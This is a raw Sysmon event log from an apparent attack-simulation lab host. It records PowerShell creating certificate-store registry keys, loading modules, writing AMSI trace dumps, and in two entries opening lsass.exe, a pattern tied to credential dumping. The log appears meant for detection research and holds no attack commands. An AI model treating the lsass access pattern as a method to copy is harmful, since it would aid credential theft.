12241200x80000000000000001530809Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530808Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530807Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530806Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530805Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530804Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530803Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530802Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530801Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530800Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530799Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530798Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530797Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530796Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530795Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.833{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x80000000000000001530794Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x80000000000000001530793Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x80000000000000001530792Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x80000000000000001530791Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530790Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530789Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530788Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530787Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530786Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530785Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530784Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530783Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530782Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530781Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530780Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530779Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530778Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530777Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530776Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530775Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530774Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530773Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530772Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530771Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x80000000000000001530770Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\4576558f9b71a2bbc8a274844c5530c8\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=A8DA77D12ECE05B2F62E9C4953661141,SHA256=FC27E15E339A52EF8C0D829E7E6800365A1755A8F6DD1650018EA73CFC18996Ffalse-Unavailable 734700x80000000000000001530769Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.817{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\41c61395b8ebbe159552045c07ea1195\Microsoft.PowerShell.Commands.Utility.ni.dll10.0.14393.4225Microsoft Windows PowerShell Utility CommandsMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.Commands.Utility.dllMD5=0725A9ACB655F7C9AD6997C2C656BBF0,SHA256=B7A2F679AB9A46B2B8FD0DD65FDDE0440BE2D0457C55468D750726AA0C0C806Dfalse-Unavailable 11241100x80000000000000001530768Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454776_powershell.exe_1572_4524_2.dmp2021-04-21 17:30:15.802 12241200x80000000000000001530767Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x80000000000000001530766Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x80000000000000001530765Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x80000000000000001530764Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530763Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530762Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530761Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530760Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530759Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530758Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530757Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530756Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530755Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530754Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530753Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530752Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530751Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530750Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530749Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530748Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530747Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530746Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530745Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530744Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.802{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 11241100x80000000000000001530743Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.802{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530742Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.802{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3DC89A6216EDB860468C7FCFB5F5263,SHA256=3BB60396F4A4E303F5CDB82EDD65CB4BA25CD9D6DAEE42DCCBB2DACDD699C0C2falsefalse - insufficient disk space 11241100x80000000000000001530741Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.786{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176454804_powershell.exe_1572_4524_1.dmp2021-04-21 17:30:15.786 734700x80000000000000001530740Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.768{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\7ab98d11d73082b7d4da412e9164824c\Microsoft.CSharp.ni.dll4.8.3761.0Microsoft.CSharp.dllMicrosoft® .NET FrameworkMicrosoft CorporationMicrosoft.CSharp.dllMD5=B9E34CEC4D766AFE6195FCDD5C265721,SHA256=E1D7D03019EFE1A8247C17C2575F647A7FF7E0B6C9CB9996BA29EBB8F9A8C303false-Unavailable 354300x80000000000000001530739Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:12.280{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local64682-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 10341000x80000000000000001530738Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.748{21761711-83AD-607D-0B00-00000000BB01}6286736C:\Windows\system32\lsass.exe{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530737Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.748{21761711-83AD-607D-0B00-00000000BB01}6286736C:\Windows\system32\lsass.exe{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530736Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.748{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 11241100x80000000000000001530735Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.748{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530734Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.748{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=922E4566DE189768EF83FEA5E0EA9AF5,SHA256=E6E444998DDD5BB2721DEDA955DF1A31D879FF5EEBBA5F81ED6BB952C4C3EBF2falsefalse - insufficient disk space 